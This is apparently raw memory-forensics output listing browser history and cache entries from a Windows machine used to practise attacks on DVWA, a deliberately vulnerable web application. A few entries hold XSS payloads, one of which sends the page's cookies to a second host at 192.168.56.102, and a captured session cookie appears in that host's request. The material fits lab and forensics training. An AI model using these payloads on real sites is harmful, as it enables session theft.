**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f5000
Record length: 0x100
Location: Visited: Administrator@http://www.bing.com/search?format=rss&q=localhost&src=IE-Address
Last modified: 2015-08-23 10:32:03 UTC+0000
Last accessed: 2015-08-23 10:32:03 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc0
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f5180
Record length: 0x180
Location: Visited: Administrator@res://iesetup.dll/HardAdmin.htm
Last modified: 2015-08-23 10:31:51 UTC+0000
Last accessed: 2015-08-23 10:31:51 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa0
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f6000
Record length: 0x180
Location: Visited: Administrator@http://www.bing.com/search?q=localhost&src=IE-Address
Last modified: 2015-08-23 10:32:59 UTC+0000
Last accessed: 2015-08-23 10:32:59 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xb8
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f6180
Record length: 0x100
Location: Visited: Administrator@http://localhost/dvwa/security.php?phpids=on
Last modified: 2015-09-02 05:59:58 UTC+0000
Last accessed: 2015-09-02 05:59:58 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xac
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f6280
Record length: 0x100
Location: Visited: Administrator@http://localhost
Last modified: 2015-09-02 05:59:08 UTC+0000
Last accessed: 2015-09-02 05:59:08 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0x90
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f6380
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/security.php
Last modified: 2015-09-02 06:00:18 UTC+0000
Last accessed: 2015-09-02 06:00:18 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa4
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f6500
Record length: 0x100
Location: Visited: Administrator@http://localhost/dvwa/security.php?phpids=off
Last modified: 2015-09-02 06:00:18 UTC+0000
Last accessed: 2015-09-02 06:00:18 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xb0
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f6680
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/security.php?test=%22><script>eval(window.name)</script>
Last modified: 2015-09-02 06:00:06 UTC+0000
Last accessed: 2015-09-02 06:00:06 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xd0
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f6800
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/security.php
Last modified: 2015-09-02 06:00:16 UTC+0000
Last accessed: 2015-09-02 06:00:16 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa4
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f7000
Record length: 0x180
Location: Visited: Administrator@http://localhost/dashboard
Last modified: 2015-09-03 10:03:01 UTC+0000
Last accessed: 2015-09-03 10:03:01 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0x9c
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f7180
Record length: 0x100
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/xss_r/vulnerabilities/xss_r
Last modified: 2015-09-02 06:05:41 UTC+0000
Last accessed: 2015-09-02 06:05:41 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc4
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f7280
Record length: 0x100
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/xss_s/vulnerabilities/xss_s
Last modified: 2015-09-03 06:49:30 UTC+0000
Last accessed: 2015-09-03 06:49:30 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc4
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f7480
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/upload
Last modified: 2015-09-02 06:01:11 UTC+0000
Last accessed: 2015-09-02 06:01:11 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xac
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f7600
Record length: 0x100
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/upload/vulnerabilities/upload
Last modified: 2015-09-02 06:00:22 UTC+0000
Last accessed: 2015-09-02 06:00:22 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc4
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f7700
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/ids_log.php
Last modified: 2015-09-02 06:05:13 UTC+0000
Last accessed: 2015-09-02 06:05:13 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa4
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f7880
Record length: 0x100
Location: Visited: Administrator@http://192.168.56.102/favicon.ico
Last modified: 2015-09-02 06:04:40 UTC+0000
Last accessed: 2015-09-02 06:04:40 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xa4
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f7980
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/index.php
Last modified: 2015-09-02 06:05:13 UTC+0000
Last accessed: 2015-09-02 06:05:13 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa0
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f8000
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/ids_log.php
Last modified: 2015-09-02 06:05:49 UTC+0000
Last accessed: 2015-09-02 06:05:49 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa4
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f8200
Record length: 0x180
Location: Visited: Administrator@http://192.168.56.102/?security=low;%20_ga=GA1.1.1982739354.1440366396;%20_gat=1;%20PHPSESSID=gt9jmpq3k9h0hbtrpiqgrj0nc0
Last modified: 2015-09-02 06:05:05 UTC+0000
Last accessed: 2015-09-02 06:05:05 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xf8
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f8380
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%22http%3A%2F%2F192.168.56.102%2F%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
Last modified: 2015-09-02 06:05:05 UTC+0000
Last accessed: 2015-09-02 06:05:05 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0x120
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f8500
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/ids_log.php
Last modified: 2015-09-02 06:05:42 UTC+0000
Last accessed: 2015-09-02 06:05:42 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa4
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f8680
Record length: 0x200
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/xss_r
Last modified: 2015-09-02 06:05:42 UTC+0000
Last accessed: 2015-09-02 06:05:42 UTC+0000
File Offset: 0x200, Data Offset: 0x0, Data Length: 0xac
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f8880
Record length: 0x200
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/xss_s
Last modified: 2015-09-02 06:05:43 UTC+0000
Last accessed: 2015-09-02 06:05:43 UTC+0000
File Offset: 0x200, Data Offset: 0x0, Data Length: 0xac
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f9000
Record length: 0x200
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/xss_s
Last modified: 2015-09-03 10:03:01 UTC+0000
Last accessed: 2015-09-03 10:03:01 UTC+0000
File Offset: 0x200, Data Offset: 0x0, Data Length: 0xac
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f9200
Record length: 0x100
Location: Visited: Administrator@http://localhost/setup.php
Last modified: 2015-09-02 06:05:45 UTC+0000
Last accessed: 2015-09-02 06:05:45 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0x9c
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f9300
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/index.php
Last modified: 2015-09-03 06:49:29 UTC+0000
Last accessed: 2015-09-03 06:49:29 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa0
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f9480
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/setup.php
Last modified: 2015-09-02 06:05:47 UTC+0000
Last accessed: 2015-09-02 06:05:47 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa0
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f9600
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/login.php
Last modified: 2015-09-03 06:49:28 UTC+0000
Last accessed: 2015-09-03 06:49:28 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa0
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f9780
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa
Last modified: 2015-09-03 06:49:23 UTC+0000
Last accessed: 2015-09-03 06:49:23 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0x98
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x25f9900
Record length: 0x200
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/xss_s
Last modified: 2015-09-03 10:03:01 UTC+0000
Last accessed: 2015-09-03 10:03:01 UTC+0000
File Offset: 0x200, Data Offset: 0x0, Data Length: 0xac
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2606080
Record length: 0x180
Location: http://localhost/dashboard/
Last modified: 2015-08-12 15:27:06 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x84, Data Length: 0x98
File: dashboard[1].htm
Data: HTTP/1.1 200 OK
ETag: "1c9f-51d1ed9ed8680"
Content-Length: 7327
Keep-Alive: timeout=5, max=99
Content-Type: text/html

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2606200
Record length: 0x100
Location: http://192.168.56.102/
Last modified: 2015-09-03 07:02:46 UTC+0000
Last accessed: 2015-09-03 07:03:41 UTC+0000
File Offset: 0x100, Data Offset: 0x80, Data Length: 0x98
File: 192_168_56_102[1].htm
Data: HTTP/1.0 200 OK
Content-type: text/html
Content-Length: 33

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2606380
Record length: 0x280
Location: http://www.bing.com/search?q=localhost&src=IE-Address
Last modified: 1970-01-01 00:00:00 UTC+0000
Last accessed: 2015-08-23 10:31:57 UTC+0000
File Offset: 0x280, Data Offset: 0xa0, Data Length: 0xb0
File: search[1].htm
Data: HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Edge-control: no-store
X-MSEdge-Ref: Ref A: 28CAA1BF243849AC8AA3106B05678BB2 Ref B: E4B0DA2CD7D3E9DD45C750FA379FB5BC Ref C: Sun Aug 23 03:31:57 2015 PST

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2606600
Record length: 0x100
Location: http://www.bing.com/favicon.ico
Last modified: 2013-10-19 01:08:06 UTC+0000
Last accessed: 2015-08-23 10:32:03 UTC+0000
File Offset: 0x100, Data Offset: 0x88, Data Length: 0x98
File: favicon[1].ico
Data: HTTP/1.1 200 OK
Content-Type: image/x-icon
Content-Length: 1150

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2607000
Record length: 0x180
Location: http://localhost/dashboard/stylesheets/normalize.css
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0xa0, Data Length: 0xb4
File: normalize[1].css
Data: HTTP/1.1 200 OK
ETag: "1adc-51b671137bc00"
Content-Length: 6876
Keep-Alive: timeout=5, max=98
Content-Type: text/css

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2607180
Record length: 0x180
Location: http://localhost/dashboard/stylesheets/all.css
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x98, Data Length: 0xa4
File: all[1].css
Data: HTTP/1.1 200 OK
ETag: "73449-51b671137bc00"
Content-Length: 472137
Keep-Alive: timeout=5, max=100
Content-Type: text/css

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2607300
Record length: 0x180
Location: http://localhost/dashboard/javascripts/modernizr.js
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x9c, Data Length: 0xac
File: modernizr[1].js
Data: HTTP/1.1 200 OK
ETag: "c8a5-51b671137bc00"
Content-Length: 51365
Keep-Alive: timeout=5, max=97
Content-Type: application/javascript

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2607680
Record length: 0x200
Location: http://cdnjs.cloudflare.com/ajax/libs/font-awesome/3.1.0/css/font-awesome.min.css
Last modified: 2014-01-13 18:17:37 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x200, Data Offset: 0xbc, Data Length: 0xd4
File: font-awesome.min[1].css
Data: HTTP/1.1 200 OK
Content-Type: text/css
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
CF-Cache-Status: HIT
CF-RAY: 21f6fc95a6f4075b-AMS

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2607880
Record length: 0x200
Location: http://cdnjs.cloudflare.com/ajax/libs/font-awesome/3.1.0/font/fontawesome-webfont.eot?
Last modified: 2014-08-15 17:30:17 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x200, Data Offset: 0xc0, Data Length: 0xdc
File: fontawesome-webfont[1].eot
Data: HTTP/1.1 200 OK
Content-Type: application/vnd.ms-fontobject
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
CF-Cache-Status: HIT
CF-RAY: 21f6fc96889a2b82-AMS

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2607a80
Record length: 0x180
Location: http://localhost/dashboard/images/xampp-logo.svg
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x9c, Data Length: 0xb0
File: xampp-logo[1].svg
Data: HTTP/1.1 200 OK
ETag: "1533-51b671137bc00"
Content-Length: 5427
Keep-Alive: timeout=5, max=99
Content-Type: image/svg+xml

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2607c00
Record length: 0x180
Location: http://localhost/dashboard/images/bitnami-xampp.png
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x9c, Data Length: 0xb4
File: bitnami-xampp[1].png
Data: HTTP/1.1 200 OK
ETag: "5675-51b671137bc00"
Content-Length: 22133
Keep-Alive: timeout=5, max=96
Content-Type: image/png

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2607d80
Record length: 0x180
Location: http://localhost/dashboard/images/fastly-logo.png
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x9c, Data Length: 0xb0
File: fastly-logo[1].png
Data: HTTP/1.1 200 OK
ETag: "6ea-51b671137bc00"
Content-Length: 1770
Keep-Alive: timeout=5, max=98
Content-Type: image/png

~U:administrator

**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x2607f00
Record length: 0x180
Location: http://localhost/dashboard/images/social-icons.png
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x9c, Data Length: 0xb0
File: social-icons[1].png
Data: HTTP/1.1 200 OK
ETag: "d21-51b671137bc00"
Content-Length: 3361
Keep-Alive: ti
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x26f5000
Record length: 0x100
Location: Cookie:administrator@www.bing.com/
Last modified: 2015-08-23 10:31:57 UTC+0000
Last accessed: 2015-08-23 10:31:57 UTC+0000
File Offset: 0x100, Data Offset: 0x8c, Data Length: 0x0
File: administrator@www.bing[2].txt
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x26f5100
Record length: 0x100
Location: Cookie:administrator@google.jo/
Last modified: 2015-08-24 07:00:17 UTC+0000
Last accessed: 2015-08-24 07:00:17 UTC+0000
File Offset: 0x100, Data Offset: 0x88, Data Length: 0x0
File: administrator@google[2].txt
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x26f5200
Record length: 0x100
Location: Cookie:administrator@localhost/
Last modified: 2015-09-02 07:01:12 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x100, Data Offset: 0x88, Data Length: 0x0
File: administrator@localhost[2].txt
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x26f5300
Record length: 0x100
Location: Cookie:administrator@localhost/
Last modified: 2015-09-03 10:03:01 UTC+0000
Last accessed: 2015-09-03 10:03:01 UTC+0000
File Offset: 0x100, Data Offset: 0x88, Data Length: 0x0
File: administrator@localhost[1].txt
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x26f5400
Record length: 0x100
Location: Cookie:administrator@bing.com/
Last modified: 2015-08-23 10:32:08 UTC+0000
Last accessed: 2015-08-23 10:32:08 UTC+0000
File Offset: 0x100, Data Offset: 0x88, Data Length: 0x0
File: administrator@bing[2].txt
**************************************************
Process: 816 explorer.exe
Cache type "URL " at 0x26f5500
Record length: 0x100
Location: Cookie:administrator@ssl.bing.com/
Last modified: 2015-08-23 10:32:12 UTC+0000
Last accessed: 2015-08-23 10:32:12 UTC+0000
File Offset: 0x100, Data Offset: 0x8c, Data Length: 0x0
File: administrator@ssl.bing[2].txt
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a5000
Record length: 0x100
Location: Visited: Administrator@http://www.bing.com/search?format=rss&q=localhost&src=IE-Address
Last modified: 2015-08-23 10:32:03 UTC+0000
Last accessed: 2015-08-23 10:32:03 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc0
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a5180
Record length: 0x180
Location: Visited: Administrator@res://iesetup.dll/HardAdmin.htm
Last modified: 2015-08-23 10:31:51 UTC+0000
Last accessed: 2015-08-23 10:31:51 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa0
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a6000
Record length: 0x180
Location: Visited: Administrator@http://www.bing.com/search?q=localhost&src=IE-Address
Last modified: 2015-08-23 10:32:59 UTC+0000
Last accessed: 2015-08-23 10:32:59 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xb8
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a6180
Record length: 0x100
Location: Visited: Administrator@http://localhost/dvwa/security.php?phpids=on
Last modified: 2015-09-02 05:59:58 UTC+0000
Last accessed: 2015-09-02 05:59:58 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xac
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a6280
Record length: 0x100
Location: Visited: Administrator@http://localhost
Last modified: 2015-09-02 05:59:08 UTC+0000
Last accessed: 2015-09-02 05:59:08 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0x90
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a6380
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/security.php
Last modified: 2015-09-02 06:00:18 UTC+0000
Last accessed: 2015-09-02 06:00:18 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa4
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a6500
Record length: 0x100
Location: Visited: Administrator@http://localhost/dvwa/security.php?phpids=off
Last modified: 2015-09-02 06:00:18 UTC+0000
Last accessed: 2015-09-02 06:00:18 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xb0
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a6680
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/security.php?test=%22><script>eval(window.name)</script>
Last modified: 2015-09-02 06:00:06 UTC+0000
Last accessed: 2015-09-02 06:00:06 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xd0
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a6800
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/security.php
Last modified: 2015-09-02 06:00:16 UTC+0000
Last accessed: 2015-09-02 06:00:16 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa4
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a7000
Record length: 0x180
Location: Visited: Administrator@http://localhost/dashboard
Last modified: 2015-09-03 10:03:01 UTC+0000
Last accessed: 2015-09-03 10:03:01 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0x9c
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a7180
Record length: 0x100
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/xss_r/vulnerabilities/xss_r
Last modified: 2015-09-02 06:05:41 UTC+0000
Last accessed: 2015-09-02 06:05:41 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc4
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a7280
Record length: 0x100
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/xss_s/vulnerabilities/xss_s
Last modified: 2015-09-03 06:49:30 UTC+0000
Last accessed: 2015-09-03 06:49:30 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc4
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a7480
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/upload
Last modified: 2015-09-02 06:01:11 UTC+0000
Last accessed: 2015-09-02 06:01:11 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xac
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a7600
Record length: 0x100
Location: Visited: Administrator@http://localhost/dvwa/vulnerabilities/upload/vulnerabilities/upload
Last modified: 2015-09-02 06:00:22 UTC+0000
Last accessed: 2015-09-02 06:00:22 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xc4
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a7700
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/ids_log.php
Last modified: 2015-09-02 06:05:13 UTC+0000
Last accessed: 2015-09-02 06:05:13 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa4
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a7880
Record length: 0x100
Location: Visited: Administrator@http://192.168.56.102/favicon.ico
Last modified: 2015-09-02 06:04:40 UTC+0000
Last accessed: 2015-09-02 06:04:40 UTC+0000
File Offset: 0x100, Data Offset: 0x0, Data Length: 0xa4
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x39a7980
Record length: 0x180
Location: Visited: Administrator@http://localhost/dvwa/index.php
Last modified: 2015-09-02 06:05:13 UTC+0000
Last accessed: 2015-09-02 06:05:13 UTC+0000
File Offset: 0x180, Data Offset: 0x0, Data Length: 0xa0
**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3986080
Record length: 0x180
Location: http://localhost/dashboard/
Last modified: 2015-08-12 15:27:06 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x84, Data Length: 0x98
File: dashboard[1].htm
Data: HTTP/1.1 200 OK
ETag: "1c9f-51d1ed9ed8680"
Content-Length: 7327
Keep-Alive: timeout=5, max=99
Content-Type: text/html

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3986200
Record length: 0x100
Location: http://192.168.56.102/
Last modified: 2015-09-03 07:02:46 UTC+0000
Last accessed: 2015-09-03 07:03:41 UTC+0000
File Offset: 0x100, Data Offset: 0x80, Data Length: 0x98
File: 192_168_56_102[1].htm
Data: HTTP/1.0 200 OK
Content-type: text/html
Content-Length: 33

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3986380
Record length: 0x280
Location: http://www.bing.com/search?q=localhost&src=IE-Address
Last modified: 1970-01-01 00:00:00 UTC+0000
Last accessed: 2015-08-23 10:31:57 UTC+0000
File Offset: 0x280, Data Offset: 0xa0, Data Length: 0xb0
File: search[1].htm
Data: HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Edge-control: no-store
X-MSEdge-Ref: Ref A: 28CAA1BF243849AC8AA3106B05678BB2 Ref B: E4B0DA2CD7D3E9DD45C750FA379FB5BC Ref C: Sun Aug 23 03:31:57 2015 PST

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3986600
Record length: 0x100
Location: http://www.bing.com/favicon.ico
Last modified: 2013-10-19 01:08:06 UTC+0000
Last accessed: 2015-08-23 10:32:03 UTC+0000
File Offset: 0x100, Data Offset: 0x88, Data Length: 0x98
File: favicon[1].ico
Data: HTTP/1.1 200 OK
Content-Type: image/x-icon
Content-Length: 1150

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3987000
Record length: 0x180
Location: http://localhost/dashboard/stylesheets/normalize.css
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0xa0, Data Length: 0xb4
File: normalize[1].css
Data: HTTP/1.1 200 OK
ETag: "1adc-51b671137bc00"
Content-Length: 6876
Keep-Alive: timeout=5, max=98
Content-Type: text/css

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3987180
Record length: 0x180
Location: http://localhost/dashboard/stylesheets/all.css
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x98, Data Length: 0xa4
File: all[1].css
Data: HTTP/1.1 200 OK
ETag: "73449-51b671137bc00"
Content-Length: 472137
Keep-Alive: timeout=5, max=100
Content-Type: text/css

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3987300
Record length: 0x180
Location: http://localhost/dashboard/javascripts/modernizr.js
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x9c, Data Length: 0xac
File: modernizr[1].js
Data: HTTP/1.1 200 OK
ETag: "c8a5-51b671137bc00"
Content-Length: 51365
Keep-Alive: timeout=5, max=97
Content-Type: application/javascript

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3987680
Record length: 0x200
Location: http://cdnjs.cloudflare.com/ajax/libs/font-awesome/3.1.0/css/font-awesome.min.css
Last modified: 2014-01-13 18:17:37 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x200, Data Offset: 0xbc, Data Length: 0xd4
File: font-awesome.min[1].css
Data: HTTP/1.1 200 OK
Content-Type: text/css
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
CF-Cache-Status: HIT
CF-RAY: 21f6fc95a6f4075b-AMS

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3987880
Record length: 0x200
Location: http://cdnjs.cloudflare.com/ajax/libs/font-awesome/3.1.0/font/fontawesome-webfont.eot?
Last modified: 2014-08-15 17:30:17 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x200, Data Offset: 0xc0, Data Length: 0xdc
File: fontawesome-webfont[1].eot
Data: HTTP/1.1 200 OK
Content-Type: application/vnd.ms-fontobject
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
CF-Cache-Status: HIT
CF-RAY: 21f6fc96889a2b82-AMS

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3987a80
Record length: 0x180
Location: http://localhost/dashboard/images/xampp-logo.svg
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
File Offset: 0x180, Data Offset: 0x9c, Data Length: 0xb0
File: xampp-logo[1].svg
Data: HTTP/1.1 200 OK
ETag: "1533-51b671137bc00"
Content-Length: 5427
Keep-Alive: timeout=5, max=99
Content-Type: image/svg+xml

~U:administrator

**************************************************
Process: 2120 FTK Imager.exe
Cache type "URL " at 0x3987c00
Record length: 0x180
Location: http://localhost/dashboard/images/bitnami-xampp.png
Last modified: 2015-07-21 18:46:08 UTC+0000
Last accessed: 2015-09-02 07:01:12 UTC+0000
